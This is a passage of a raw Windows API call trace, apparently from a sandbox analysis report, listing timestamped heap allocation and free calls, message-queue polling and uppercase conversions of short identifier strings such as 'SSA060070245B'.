Size=0x40) returned 0x248d978 [0160.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0160.634] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.634] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0160.634] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0160.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0160.635] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0160.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0160.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.638] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.639] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.639] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0160.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0160.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.640] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.640] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.641] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.641] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0160.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0160.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.644] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.644] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.644] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.645] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.645] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.645] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.645] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.645] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.646] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.646] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 